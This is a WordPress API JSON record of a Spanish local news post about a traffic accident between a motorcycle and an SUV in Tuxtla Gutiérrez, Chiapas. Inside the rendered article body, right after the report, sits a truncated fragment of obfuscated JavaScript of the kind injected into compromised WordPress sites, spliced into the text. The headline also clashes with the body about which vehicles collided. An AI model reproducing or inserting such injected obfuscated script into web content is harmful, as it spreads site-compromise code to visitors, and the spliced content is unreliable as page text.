{"id":11260,"date":"2023-08-11T01:08:04","date_gmt":"2023-08-11T01:08:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11260"},"modified":"2023-08-11T01:08:04","modified_gmt":"2023-08-11T01:08:04","slug":"camioneta-y-suv-protagonizan-accidente-de-transito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11260","title":{"rendered":"Camioneta y Suv protagonizan accidente de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"879\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691715969410-879x1024.jpg\" alt=\"\" class=\"wp-image-11261\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691715969410-879x1024.jpg 879w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691715969410-258x300.jpg 258w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691715969410-768x895.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691715969410.jpg 1080w\" sizes=\"auto, (max-width: 879px) 100vw, 879px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 10 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana una motocicleta y una camioneta tipo Suv protagonizaron un accidente de tr\u00e1nsito en el Libramiento Sur de Tuxtla Guti\u00e9rrez.Los reportes oficiales sobre este hecho informaron que, la camioneta Susuki Vitara de color blanco conducida por Amanda de Jes\u00fas de 56 a\u00f1os circulaba en el sentido de Poniente a Oriente, y al llegar al Bulevar Ciro Farrera gir\u00f3 hacia el lado derecho por lo que, el conductor de la Italika de color negro de nombre William de 36 a\u00f1os de edad se impact\u00f3 de lleno.En el lugar el herido fue atendido por param\u00e9dicos de Protecci\u00f3n Civil y afortunadamente no result\u00f3 con heridas de consideraci\u00f3n.En el lugar los conductores no aceptaron responsabilidad alguna motivo por el que, las unidades fueron trasladadas a un corral\u00f3n en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 10 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana una motocicleta y una camioneta tipo Suv protagonizaron un accidente de tr\u00e1nsito en el Libramiento Sur de Tuxtla Guti\u00e9rrez.Los reportes oficiales sobre este hecho informaron que, la camioneta Susuki Vitara de color blanco conducida por Amanda de Jes\u00fas de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11261,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11260","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11260"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11260\/revisions"}],"predecessor-version":[{"id":11262,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11260\/revisions\/11262"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11261"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}